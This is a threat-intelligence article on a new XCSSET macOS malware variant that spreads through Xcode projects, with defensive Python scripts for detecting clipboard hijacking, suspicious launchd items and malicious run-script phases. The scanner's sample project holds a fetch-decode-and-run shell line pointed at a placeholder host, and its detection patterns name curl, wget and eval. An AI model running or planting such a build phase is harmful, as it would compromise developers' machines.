Microsoft Threat Intelligence has recently uncovered a new variant of the XCSSET malware that introduces several critical updates and modules, enhancing its capabilities beyond those highlighted in earlier reports. Designed specifically to target Xcode projects—commonly utilized by software developers—the malware activates when an Xcode project is built. This method exploits the tendency of developers to share project files, particularly for those involved in Apple or macOS app development.
The latest iteration of the XCSSET malware has made significant modifications in areas like browser targeting, clipboard hijacking, and persistence strategies. It leverages advanced encryption and obfuscation methods, along with utilizing run-only compiled AppleScripts for discreet execution. Notably, the new variant has broadened its data exfiltration scope to include data from Firefox browsers, and it has introduced an additional persistence mechanism through LaunchDaemon entries.
One striking feature of this variant is its submodule that actively monitors clipboard activities. This functionality incorporates a downloaded configuration file containing regex patterns related to various digital wallets. If the malware identifies a match with clipboard content, it can alter the content to replace it with a predetermined wallet address.
Insights shared in this report aim to inform organizations about this evolving threat. Microsoft has engaged with Apple and partnered with GitHub to take down repositories affected by the XCSSET attack. This collaborative effort underscores their commitment to disrupting malicious activities and neutralizing threats.
Analysis
The newly discovered XCSSET variant adheres to a four-stage infection process. The initial three stages mirror those reported in previous iterations. This analysis begins with the fourth stage, which encompasses the boot() function, facilitating the download and execution of submodules.
Boot Function Modifications
The fourth stage’s boot() function has undergone various changes—these include additional checks for the presence of Firefox and revised logic for assessing Telegram’s existence. This stage introduces multiple new submodules that are now downloaded and executed.
In contrast, earlier versions of the boot() function are significantly simpler and less comprehensive than the latest iteration.
Info-Stealer Enhancements
The new variant’s vexyeqj submodule, previously identified as seizecj, shows several changes to its commands, including the disabling of several functions. Additionally, it downloads a new module—bnk—executed through osascript, which then deletes the downloaded file after a short wait.
The bnk module—being a run-only compiled AppleScript—poses challenges for reverse engineering. However, tools like the AppleScript disassembler project on GitHub can facilitate its analysis.
This module encompasses functions for data validation and encryption, alongside commands for retrieving additional information from its command and control (C2) server. The decoded data appears to form a configuration file.
Upon execution, the script collects the clipboard’s content after verifying it against specific conditions. It filters the data based on several parameters, including length and matching regex patterns before exfiltrating the altered clipboard data back to the C2.
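The clipboard-swapping behaviour described above can be caught on the defender's side by comparing what a user actually copied with what the clipboard holds at paste time. The following is an added example written for this page, not code from the report or from the malware: the wallet-format regexes are my own approximations of common Bitcoin and Ethereum address formats and are not the configuration file the malware downloads. Given the text that was copied and the text now in the clipboard, it reports whether a wallet address was replaced by a different address of the same kind, which is exactly the substitution the module performs.

```python
import re

# Constructed approximations of common wallet-address formats (assumption);
# NOT the regex configuration the malware retrieves from its C2.
WALLET_PATTERNS = {
    "btc_legacy": re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b"),
    "btc_bech32": re.compile(r"\bbc1[02-9ac-hj-np-z]{25,62}\b"),
    "eth": re.compile(r"\b0x[0-9a-fA-F]{40}\b"),
}


def find_wallets(text):
    """Return [(kind, address), ...] in order of appearance in the text."""
    hits = []
    for kind, pat in WALLET_PATTERNS.items():
        for m in pat.finditer(text):
            hits.append((m.start(), kind, m.group(0)))
    hits.sort()
    return [(kind, addr) for _, kind, addr in hits]


def detect_clipboard_swap(copied, pasted):
    """Compare the text a user copied with what the clipboard now holds.

    Returns None when nothing changed. A wallet address replaced by a
    different address of the same kind is reported as a 'wallet_swap'
    (the signature of clipboard hijacking); any other alteration is
    reported as 'modified' so the caller can still warn the user.
    """
    if copied == pasted:
        return None
    before = find_wallets(copied)
    after = find_wallets(pasted)
    if before and len(before) == len(after):
        for (k1, a1), (k2, a2) in zip(before, after):
            if k1 == k2 and a1 != a2:
                return {"type": "wallet_swap", "kind": k1,
                        "original": a1, "replacement": a2}
    return {"type": "modified"}


if __name__ == "__main__":
    # Constructed sample: two well-known public Bitcoin addresses stand in
    # for "what I copied" and "what the clipboard now contains".
    copied = "Send to 1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2 today"
    pasted = "Send to 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa today"
    print(detect_clipboard_swap(copied, pasted))
```

On macOS the current clipboard text can be read with `pbpaste` and the check run just before a sensitive paste; the point of the design is that the original copy is recorded by the user's own tooling, so a silent rewrite of the buffer is visible as a same-kind address change rather than as free-text drift.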
File-Stealer Module
Another submodule, neq_cdyd_ilvcmwx, retrieves additional scripts to be executed, similar to the txzx_vostfdi module used in earlier variants targeting browsers. This script is stored in the /tmp directory, and while analysis has not yet confirmed the list of files it exfiltrates, its previous iterations indicate a capability for extensive data retrieval.
Persistence Mechanisms
The xmyyeqjx submodule establishes a robust persistence mechanism by creating a LaunchDaemon entry that points at a newly created ~/.root file. This entry is the vehicle for ongoing malware operations, and it relies on several configuration settings that the malware depends on to remain persistent.
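A defender can audit launchd items for the shape of entry described here: a daemon or agent whose program lives in a hidden dotfile under a home directory (or in a temporary directory), or that invokes osascript, combined with the settings that keep it running. The script below is an added example written for this page, not Microsoft's detection logic or the malware's own code. The indicator heuristics, the sample plist, its label and the /Users/alice/.root path are all my own assumptions constructed to illustrate the check.

```python
import os
import plistlib
import re

# Standard launchd locations on macOS (daemons need root to write here).
LAUNCH_DIRS = [
    "/Library/LaunchDaemons",
    "/Library/LaunchAgents",
    os.path.expanduser("~/Library/LaunchAgents"),
]

# Heuristics (assumptions, not a published rule set): a program path that
# is a hidden file under a home directory, a path under a temp directory,
# or an osascript invocation.
HIDDEN_IN_HOME = re.compile(r"^(?:/Users/[^/]+|/var/root|~)/\.[^/]+")
TEMP_PATHS = re.compile(r"^/(?:private/)?(?:tmp|var/tmp)/")


def program_paths(item):
    """Collect every path-like string the launch item would execute."""
    paths = []
    if "Program" in item:
        paths.append(str(item["Program"]))
    paths.extend(str(a) for a in item.get("ProgramArguments", []))
    return paths


def assess_launch_item(plist_bytes, label="<inline>"):
    """Return a list of (indicator, detail) findings for one launchd plist."""
    item = plistlib.loads(plist_bytes)
    findings = []
    for p in program_paths(item):
        if HIDDEN_IN_HOME.match(p):
            findings.append(("hidden_home_path", p))
        if TEMP_PATHS.match(p):
            findings.append(("temp_path", p))
        if os.path.basename(p) == "osascript":
            findings.append(("osascript", p))
    # RunAtLoad plus KeepAlive means launchd starts the job at boot/login
    # and restarts it whenever it exits: the classic persistence pairing.
    if item.get("RunAtLoad") and item.get("KeepAlive"):
        findings.append(("run_at_load_keepalive", item.get("Label", label)))
    return findings


def scan_launch_dirs(dirs=LAUNCH_DIRS):
    """Walk the launchd directories and return {path: findings} for hits."""
    report = {}
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            if not name.endswith(".plist"):
                continue
            path = os.path.join(d, name)
            try:
                with open(path, "rb") as fh:
                    findings = assess_launch_item(fh.read(), label=path)
            except (OSError, plistlib.InvalidFileException, ValueError):
                continue  # unreadable or malformed: skip, do not crash the audit
            if findings:
                report[path] = findings
    return report


# Constructed sample modelled on the page's description (a daemon entry
# pointing at a hidden ~/.root file); label and user name are illustrative.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key><string>com.example.sample</string>
    <key>ProgramArguments</key>
    <array><string>/bin/sh</string><string>/Users/alice/.root</string></array>
    <key>RunAtLoad</key><true/>
    <key>KeepAlive</key><true/>
</dict>
</plist>
"""

if __name__ == "__main__":
    print(assess_launch_item(SAMPLE_PLIST))
    for path, findings in scan_launch_dirs().items():
        print(path, findings)
```

Run it as the user for the agent directories and with elevated privileges to read /Library/LaunchDaemons; a hit is a lead for inspection, since legitimate software also uses RunAtLoad and KeepAlive, but a root daemon whose program is a dotfile in a home directory has no benign explanation worth assuming.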
Git-based Persistence Updates
The jey module’s command structure has evolved significantly. The old version directly concatenated encrypted payloads, whereas the latest version encapsulates decryption logic inside a shell function, enhancing the overall obfuscation strategy.
New Info-Stealer for Firefox
A noteworthy addition involves the introduction of the iewmilh_cdyd module, which extracts data stored by Firefox. Utilizing a modified version of the HackBrowserData project, this module can retrieve sensitive information such as passwords and browsing history.
Mitigation and Protection Guidance
Organizations can take several proactive measures to mitigate threats posed by XCSSET:
- Keep operating systems and applications updated, deploying security patches promptly.
- Scrutinize Xcode projects downloaded from external sources, ensuring their integrity.
- Exercise due caution when copying and pasting sensitive data to avoid clipboard hijacking incidents.
- Advocate for the use of browsers like Microsoft Edge with defense mechanisms such as SmartScreen to protect against malicious URLs.
- Implement Microsoft Defender for Endpoint on Mac, which can detect and combat the discussed malware.
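Scrutinizing a downloaded Xcode project means, in practice, reading its run-script build phases, since those are what execute when the project is built. The following is an added example for this page, not a Microsoft tool and not code from the report: it pulls every `shellScript` string out of a `project.pbxproj` file (an OpenStep-style plist that `plistlib` cannot parse, hence the regex) and flags phases matching a small set of indicator heuristics of my own choosing: remote fetches, decode-and-run pipelines, `eval`, osascript invocations, and execution from /tmp. The sample project text and its placeholder URL are constructed for the demonstration.

```python
import re
import sys

# Run-script phases appear in project.pbxproj as:  shellScript = "..." ;
# with inner quotes and newlines backslash-escaped.
SHELL_SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"\s*;')

# Indicator heuristics (assumptions, not a published rule set).
INDICATORS = {
    "osascript": re.compile(r"\bosascript\b"),
    "remote_fetch": re.compile(r"\b(?:curl|wget)\b"),
    "decode_and_run": re.compile(
        r"base64\s+(?:-d|--decode|-D)\b.*\|\s*(?:sh|bash|zsh|osascript)\b"),
    "eval": re.compile(r"\beval\b"),
    "temp_exec": re.compile(r"/(?:private/)?tmp/\S+"),
}


def unescape_pbx(s):
    """Undo the backslash escaping used inside pbxproj string literals."""
    return re.sub(r"\\(.)",
                  lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)),
                  s)


def extract_run_scripts(pbxproj_text):
    """Return the decoded shell text of every run-script phase, in file order."""
    return [unescape_pbx(m.group(1))
            for m in SHELL_SCRIPT_RE.finditer(pbxproj_text)]


def scan_pbxproj(pbxproj_text):
    """Return [(phase_index, [indicator, ...]), ...] for suspicious phases."""
    results = []
    for i, script in enumerate(extract_run_scripts(pbxproj_text)):
        hits = [name for name, pat in INDICATORS.items() if pat.search(script)]
        if hits:
            results.append((i, hits))
    return results


# Constructed sample: one ordinary lint phase and one phase that fetches,
# decodes and runs remote content, then runs AppleScript from /tmp.
# The URL is a placeholder, not a real indicator from the report.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
		AA00 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			shellPath = /bin/sh;
			shellScript = "echo \"Building ${PRODUCT_NAME}\"\nswiftlint\n";
		};
		BB00 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			shellPath = /bin/sh;
			shellScript = "curl -s http://example.invalid/p | base64 -d | sh\nosascript /tmp/.stage\n";
		};
/* End PBXShellScriptBuildPhase section */
'''

if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_PBXPROJ
    for index, hits in scan_pbxproj(text):
        print(f"run-script phase #{index}: {', '.join(hits)}")
```

Point it at `MyApp.xcodeproj/project.pbxproj` before opening a third-party project; a clean result does not prove the project safe, but any hit deserves reading the phase in full before the first build, because that build is the moment the malware runs.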
Additionally, for users of Microsoft Defender for Endpoint, activating cloud-delivered protection and applying comprehensive potentially unwanted application (PUA) protection can further reduce exposure to malicious threats.
As the landscape of cyber threats evolves, continuing the exchange of information between security stakeholders remains essential for maintaining organizational defenses.